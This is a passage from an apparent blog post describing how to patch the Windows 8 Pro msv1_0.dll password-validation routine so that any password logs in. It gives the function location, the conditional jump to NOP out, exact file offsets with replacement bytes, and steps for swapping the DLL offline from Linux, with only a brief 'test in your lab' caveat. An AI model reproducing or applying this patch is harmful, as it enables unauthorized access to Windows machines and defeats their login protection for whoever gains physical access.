I’ve always wondered what this logo reminds me of…wait it was an old Greek state flag from 1822 – 1969 The colors were used in the Greek revolution when they fought the Ottoman Empire.
OK, now we move next to the latest OS from Microsoft -> Windows 8 Pro 64bit. There seems to be a big void in the description of various functions inside the library, so it makes debugging harder, but not impossible. I had to go manually trough all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. There seems to be incomplete info on the Microsoft Symbol Server for the PDB of msv1_0.dll (or at least this is how I understand this)
So after a careful analysis I came up with the following anonymous function that should correspond to MsvpPasswordValidate :
It is : sub_18001014C
Next we look for the RtlCompareMemory function and patch our jnz loc with NOP, in this case it is starting with loc_1800101F0 and jnz_loc 18001B4B7
So we open it in HEX view and do our modifications of the jnz_loc 18001B4B7
Produce a diff and patch the file, reboot to linux, copy over the C:\windows\system32\msv1_0.dll and reboot, any password should work to login into the system.
msv1_0.dll 0000F609: 0F 90 0000F60A: 85 90 0000F60B: A8 90 0000F60C: B2 90 0000F60D: 00 90 0000F60E: 00 90
Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.
